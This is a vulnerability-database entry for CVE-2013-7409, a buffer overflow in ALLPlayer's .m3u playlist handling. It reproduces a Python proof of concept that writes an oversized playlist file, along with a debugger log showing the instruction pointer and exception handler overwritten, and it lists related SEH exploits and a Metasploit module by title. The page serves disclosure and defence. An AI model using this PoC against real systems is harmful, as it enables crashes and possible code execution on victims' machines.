CVE-2013-7409
Description
Buffer overflow in ALLPlayer 5.6.2 through 5.8.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long string in a .m3u (playlist) file.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (PoC)
Title: ALLPlayer Local Buffer Overflow PoC UNICODE
Vendor: http://www.allplayer.org/download/allplayer
Date found: 09.10.2013
Date published: 09.10.2013
Platform: windows 7 German
Bug: Buffer Overflow UNICODE
----------------------------
1)VERSIONS AFFECTED
----
ALLPlayer 5.6.2
2)Proof of Concept
------------------
junk = "http://"
buffer="\x41" * 5000
exploit = junk + buffer
try:
out_file = open("ALLPlayer_Poc.m3u",'w')
out_file.write(exploit)
out_file.close()
print "Exploit file created!"
except:
print "Error"
3)-(DEBUG)
----------
(1e60.1dec): Access violation - code c0000005 (!!! second chance !!!)
*** WARNING: Unable to verify checksum for C:\Program Files\ALLPlayer\ALLPlayer.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\ALLPlayer\ALLPlayer.exe
eax=00000000 ebx=00000000 ecx=00410041 edx=770d720d esi=00000000 edi=00000000
eip=00410041 esp=000311c4 ebp=000311e4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
ALLPlayer+0x10041:
00410041 008bc0ff2504 add byte ptr [ebx+425FFC0h],cl ds:0023:0425ffc0=??
0:000> !exchain
---------------
0012e4b0: ALLPlayer+1b7037 (005b7037)
0012e734: ALLPlayer+10041 (00410041)
Invalid exception stack at 00410041
4)Credits
---------
metacom
Contact : metacom27 at gmail.comALLPlayer - '.m3u' Local Buffer Overflow (Metasploit)
ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (SEH Unicode)
ALLPlayer 5.7 - '.m3u' UNICODE Buffer Overflow (SEH)
ALLPlayer 5.8.1 - '.m3u' Local Buffer Overflow (SEH)
Metasploit modules
References
- http://osvdb.org/show/osvdb/98283
- http://packetstormsecurity.com/files/123554/ALLPlayer-5.6.2-Buffer-Overflow.html
- http://packetstormsecurity.com/files/123986/ALLPlayer-5.6.2-SEH-Buffer-Overflow.html
- http://packetstormsecurity.com/files/124161/ALLPlayer-5.7-Buffer-Overflow.html
- http://packetstormsecurity.com/files/125519/ALLPlayer-5.8.1-Buffer-Overflow.html
- http://www.exploit-db.com/exploits/28855
- http://www.exploit-db.com/exploits/29549
- http://www.exploit-db.com/exploits/29798
- http://www.exploit-db.com/exploits/32041
- http://www.exploit-db.com/exploits/32074
- http://www.securityfocus.com/bid/62926
- http://osvdb.org/show/osvdb/98283
- http://packetstormsecurity.com/files/123554/ALLPlayer-5.6.2-Buffer-Overflow.html
- http://packetstormsecurity.com/files/123986/ALLPlayer-5.6.2-SEH-Buffer-Overflow.html
- http://packetstormsecurity.com/files/124161/ALLPlayer-5.7-Buffer-Overflow.html
- http://packetstormsecurity.com/files/125519/ALLPlayer-5.8.1-Buffer-Overflow.html
- http://www.exploit-db.com/exploits/28855
- http://www.exploit-db.com/exploits/29549
- http://www.exploit-db.com/exploits/29798
- http://www.exploit-db.com/exploits/32041
- http://www.exploit-db.com/exploits/32074
- http://www.securityfocus.com/bid/62926
CWEs
CWE-119
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.